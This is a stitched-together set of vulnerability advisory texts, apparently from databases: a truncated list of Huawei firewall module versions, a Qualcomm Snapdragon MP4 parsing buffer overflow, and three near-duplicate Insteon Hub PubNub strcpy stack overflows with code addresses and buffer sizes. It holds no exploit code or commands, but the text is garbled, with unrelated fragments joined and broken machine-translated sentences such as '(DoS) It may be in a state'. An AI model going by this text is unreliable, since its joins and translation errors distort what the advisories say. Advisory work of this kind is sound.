Module V100R001C10 Version, V100R001C20 Version, V100R001C30 Version, V500R001C00 Version, V500R001C20 Version, V500R001C30 Version, V500R001C50 Version; NGFW Module V100R001C10 Version, V100R001C20 Version, V100R001C30 Version, V500R001C00 Version, V500R001C20 Version, V500R002C00 version, V500R002C10 version; NIP6300, etc

In Snapdragon Automobile, Snapdragon Wearable and Snapdragon Mobile MDM9206,MDM9607,MDM9650,SD 210/SD 212/SD 205,SD 400,SD 410/12,SD 425,SD 430,SD 450,SD 600,SD 602A,SD 615/16/SD 415,SD 617,SD 625,SD 650/52,SD 800,SD 808,SD 810,SD 820,SD 820Am,SD 835,SD 845,MSM8909W, improper input validation in video_fmt_mp4r_process_atom_avc1() causes a potential buffer overflow. plural Qualcomm Snapdragon The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Google Android is prone to multiple unspecified security vulnerabilities. Little is known about these issues or its effects at this time. We will update this BID as more information emerges. Android is a Linux-based open source operating system jointly developed by Google and the Open Handheld Alliance (OHA). Qualcomm closed-source components is one of the closed-source components developed by Qualcomm (Qualcomm). There is a buffer overflow vulnerability in the Qualcomm closed-source component in Android. The vulnerability is caused by the program not performing input validation correctly in the 'video_fmt_mp4r_process_atom_avc1()' function. An attacker could exploit this vulnerability to execute code or cause a denial of service

Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_schd, at 0x9d01a144, the value for the `on` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow. (DoS) It may be in a state

Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_schd, at 0x9d01a1d4, the value for the `days` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow. (DoS) It may be in a state

Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_schd, at 0x9d01a18c, the value for the `off` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow. (DoS) It may be in a state